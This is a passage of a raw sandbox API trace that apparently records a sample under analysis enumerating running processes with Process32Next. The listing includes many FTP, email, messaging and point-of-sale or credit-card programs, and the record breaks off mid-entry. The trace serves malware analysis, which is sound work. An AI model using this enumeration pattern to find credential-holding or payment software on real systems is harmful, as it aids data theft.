[0227.853] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.855] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.857] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0227.860] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0227.862] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0227.864] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0227.867] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.870] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0227.907] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0227.909] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0227.911] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0227.913] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0227.915] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0227.918] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.920] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0227.922] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0227.924] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0227.926] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.928] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0227.930] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0227.932] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0227.936] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0227.938] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0227.940] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0227.947] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0227.950] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0227.952] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0227.954] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0227.956] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0227.958] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0227.960] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0227.963] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0227.965] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0227.967] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0227.971] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0227.973] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0227.975] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0227.978] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0227.980] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0227.982] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0227.989] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0227.992] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0227.994] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0227.997] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0227.999] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0228.001] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0228.004] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0228.006] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0228.009] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0228.011] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0228.013] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0228.015] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0228.018] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0228.020] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0228.024] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0228.026] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0228.028] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0228.030] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0228.032] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0228.034] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0228.036] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0228.048] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0228.050] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0228.052] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0228.054] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0228.056] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0228.059] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0228.061] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0228.063] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0228.065] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0228.067] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0228.072] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0228.074] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0228.076] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0228.078] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0228.080] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0228.082] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0228.084] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0228.086] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0228.088] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0228.090] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0228.092] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0228.094] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0228.096] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0228.097] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, 